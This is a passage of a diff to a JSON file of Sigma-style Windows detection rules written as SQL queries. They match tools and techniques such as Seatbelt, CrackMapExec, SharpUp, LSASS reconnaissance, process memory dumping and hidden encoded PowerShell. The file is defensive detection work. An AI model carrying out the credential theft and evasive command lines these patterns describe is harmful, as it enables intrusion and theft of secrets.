'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "status": "test", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion" ], @@ -16606,1216 +16225,1161 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", - "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "status": "experimental", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.t1059.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "status": "test", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' 